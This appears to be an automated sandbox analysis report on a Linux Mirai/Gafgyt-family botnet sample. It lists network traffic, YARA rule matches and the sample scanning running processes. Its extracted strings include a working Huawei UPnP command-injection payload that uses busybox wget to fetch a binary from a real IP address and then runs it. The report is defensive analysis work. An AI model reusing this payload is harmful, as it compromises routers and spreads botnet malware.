          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38144
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
          Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38146
          Source: unknownNetwork traffic detected: HTTP traffic on port 33982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
          Source: unknownNetwork traffic detected: HTTP traffic on port 43796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38148
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
          Source: unknownNetwork traffic detected: HTTP traffic on port 49066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
          Source: unknownNetwork traffic detected: HTTP traffic on port 46786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41782
          Source: unknownNetwork traffic detected: HTTP traffic on port 53562 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54454 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33524 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41784
          Source: unknownNetwork traffic detected: HTTP traffic on port 56576 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51106
          Source: unknownNetwork traffic detected: HTTP traffic on port 36960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53768
          Source: unknownNetwork traffic detected: HTTP traffic on port 47678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44160 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51100
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53762
          Source: unknownNetwork traffic detected: HTTP traffic on port 57420 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53760
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51104
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51102
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53770
          Source: unknownNetwork traffic detected: HTTP traffic on port 41074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51118
          Source: unknownNetwork traffic detected: HTTP traffic on port 43760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49054 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51112
          Source: unknownNetwork traffic detected: HTTP traffic on port 33536 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53772
          Source: unknownNetwork traffic detected: HTTP traffic on port 47666 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39264 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51110
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51116
          Source: unknownNetwork traffic detected: HTTP traffic on port 54466 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53776
          Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51114
          Source: unknownNetwork traffic detected: HTTP traffic on port 56588 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40290 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53780
          Source: unknownNetwork traffic detected: HTTP traffic on port 47208 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51128
          Source: unknownNetwork traffic detected: HTTP traffic on port 41062 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38192
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38194
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38196
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51122
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53784
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38198
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51120
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51126
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51124
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53786
          Source: unknownNetwork traffic detected: HTTP traffic on port 54008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50836 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53792
          Source: unknownNetwork traffic detected: HTTP traffic on port 57432 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51130
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49042 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33548 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47654 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38180
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38182
          Source: unknownNetwork traffic detected: HTTP traffic on port 54478 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38184
          Source: unknownNetwork traffic detected: HTTP traffic on port 36502 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38186
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53796
          Source: unknownNetwork traffic detected: HTTP traffic on port 52694 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38188
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51134
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53794
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51132
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51138
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53798
          Source: unknownNetwork traffic detected: HTTP traffic on port 46808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60614 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51136
          Source: unknownNetwork traffic detected: HTTP traffic on port 43314 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51140
          Source: unknownNetwork traffic detected: HTTP traffic on port 39276 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34404 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49030 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52682 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33428 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45040 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56540 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34382 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44218 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40228 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41182 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34370 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56552 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40194 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52670 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 34416 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51188
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51186
          Source: unknownNetwork traffic detected: HTTP traffic on port 43206 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
          Source: unknownNetwork traffic detected: HTTP traffic on port 39252 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 46774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45064 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
          Source: unknownNetwork traffic detected: HTTP traffic on port 34428 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53574 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57540 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 43218 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33512 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45052 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35286 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53586 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44206 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57468 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39156 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42086 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36646 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53466 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53454 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36634 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 33850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42074 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39144 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53900
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53906
          Source: unknownNetwork traffic detected: HTTP traffic on port 50932 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53904
          Source: unknownNetwork traffic detected: HTTP traffic on port 36658 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36622 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50968 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 42796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47316 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53908
          Source: unknownNetwork traffic detected: HTTP traffic on port 47786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53914
          Source: unknownNetwork traffic detected: HTTP traffic on port 48630 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53910
          Source: unknownNetwork traffic detected: HTTP traffic on port 37972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 56238 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 48654 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 44292 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47328 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52104 -> 443

          System Summary

          barindex
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
          Source: Process Memory Space: skyljne.x86.elf PID: 6254, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKskyljne.armskyljne.arm5skyljne.arm6skyljne.arm7skyljne.mipsskyljne.mpslskyljne.x86_64skyljne.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.245.236.152 -l /tmp/linuxxx -r /skyljne.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /proc/proc/%d/cmdline/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/wgetcurlechocatnanoanko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverQ
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: skyljne.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
          Source: 6254.1.0000000008048000.000000000805d000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
          Source: Process Memory Space: skyljne.x86.elf PID: 6254, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: classification engineClassification label: mal100.troj.linELF@0/0@20/0
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1582/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/3088/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/230/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/110/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/231/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/111/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/232/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1579/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/112/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/233/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1699/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/113/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/234/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1335/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1698/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/114/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/235/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1334/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/1576/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/2302/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/115/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/236/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/116/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/237/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/117/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/118/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/910/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/119/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/912/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/10/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/2307/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/11/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/918/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/6241/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/12/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/13/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/14/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/15/cmdlineJump to behavior
          Source: /tmp/skyljne.x86.elf (PID: 6256)File opened: /proc/16/cmdlineJump to behavior
